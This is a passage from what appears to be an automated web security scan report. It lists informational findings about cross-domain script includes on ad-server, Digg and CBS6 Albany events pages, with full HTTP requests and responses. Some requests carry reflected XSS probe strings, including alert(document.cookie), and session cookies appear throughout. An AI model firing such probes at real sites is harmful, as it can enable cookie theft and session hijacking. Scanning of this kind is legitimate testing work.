FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:4,26,1:2,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:2,26,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,9:951,2,9:826,187,14:951,2,14:951,11,14:951,7,9:951,7,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=13:6:7:0:2:6:3:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:4,26,1:2,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:2,26,1;expires=Sun, 27 Feb 2011 22:43:52 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=66
Expires: Fri, 28 Jan 2011 22:44:58 GMT
Date: Fri, 28 Jan 2011 22:43:52 GMT
Connection: close
Content-Length: 2501

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='realmedia728
...[SNIP]...
</span>")
document.write('<SCRIPT SRC="http://ib.adnxs.com/ttj?id=57040&pubclick=http://yads.zedo.com/ads2/c%3Fa=775740%3Bn=951%3Bx=2304%3Bc=951000002,951000002%3Bg=172%3Bi=6%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=6%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=2%3Bss=2%3Bsi=6%3Bse=1%3Bk=&cb=' + Math.random() + '" TYPE="text/javascript">');
document.write('<\/script>
...[SNIP]...

18.138. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-401/d3/jsc/fm.js?c=11/2&a=0&f=&n=951&r=13&d=14&q=&$=&s=2&z=0.6230065044946969 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZCBC=1; FFgeo=5386156; aps=2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1; ZFFAbh=749B826,20|1483_759#365; FFpb=1220:4f791'$951:realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; FFcat=826,187,14:951,2,14:826,187,9:951,2,9:951,11,14:951,7,9:951,7,14:826,187,7:951,7,7:1220,101,9; FFad=7:0:12:5:2:6:3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:4,26,1:2,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:2,26,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,11,14:951,2,14:826,187,9:951,2,9:951,7,9:951,7,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=8:3:0:12:5:6:3:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1;expires=Sun, 27 Feb 2011 22:43:52 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=66
Expires: Fri, 28 Jan 2011 22:44:58 GMT
Date: Fri, 28 Jan 2011 22:43:52 GMT
Connection: close
Content-Length: 2239

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='realmedia728
...[SNIP]...
</span>")
document.write('<script language="javascript" src="http://media.fastclick.net/w/get.media?sid=54393&tp=5&d=j&t=n"><\/script>
...[SNIP]...

18.139. http://digg.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:25:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163912321857224960%3A171; expires=Sun, 30-Jan-2011 05:25:28 GMT; path=/; domain=digg.com
Set-Cookie: d=f148f02d29ba659b182b1c54e053268c0b2309202a4d0c9ea1fb51eef766d1ad; expires=Thu, 28-Jan-2021 15:33:08 GMT; path=/; domain=.digg.com
X-Digg-Time: D=27902 10.2.128.186
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7633

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</div>
<script src="http://cdn1.diggstatic.com/js/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://cdn2.diggstatic.com/js/lib.b29284a6.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn3.diggstatic.com/js/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

18.140. http://events.cbs6albany.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1 HTTP/1.1
Host: events.cbs6albany.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 28 Jan 2011 17:37:18 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 43
ETag: "3438eef8566da91c0a816f482d081bc2"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; path=/; expires=Sat, 28-Jan-2012 17:37:18 GMT
Set-Cookie: zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; path=/; expires=Sat, 28-Jan-2012 17:37:18 GMT
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Thu, 28-Apr-2011 17:37:18 GMT; HttpOnly
Content-Length: 50101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.141. http://events.cbs6albany.com/%3F376e5%2522%253E%253Cscript%253Ealert(1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /%3F376e5%2522%253E%253Cscript%253Ealert(1

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /%3F376e5%2522%253E%253Cscript%253Ealert(1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:52:37 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
Cache-Control: no-cache, private
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:52:37 GMT; HttpOnly
Content-Length: 10226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
to find and post events, concerts, festivals, live music, and other things to do near you. Zvents is a free search engine where you can search for what to do by location, time, or event type." />


<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.142. http://events.cbs6albany.com/%3F376e5%2522%253E%253Cscript%253Ealert(document.cookie

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /%3F376e5%2522%253E%253Cscript%253Ealert(document.cookie

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /%3F376e5%2522%253E%253Cscript%253Ealert(document.cookie HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:52:51 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
Cache-Control: no-cache, private
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:52:51 GMT; HttpOnly
Content-Length: 11377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
to find and post events, concerts, festivals, live music, and other things to do near you. Zvents is a free search engine where you can search for what to do by location, time, or event type." />


<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.143. http://events.cbs6albany.com/albany-ny/events

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/events HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:06 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 41
ETag: "a237b25e0a55c754a542a1bd6c589c20"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:06 GMT; HttpOnly
Content-Length: 49439

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.144. http://events.cbs6albany.com/albany-ny/events/arts+crafts

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/arts+crafts

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/events/arts+crafts HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:32:42 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 4013
ETag: "8312f3a00003c16e378c14aead74f993"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:32:42 GMT; HttpOnly
Content-Length: 23828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.145. http://events.cbs6albany.com/albany-ny/events/business+tech

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/business+tech

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/events/business+tech HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
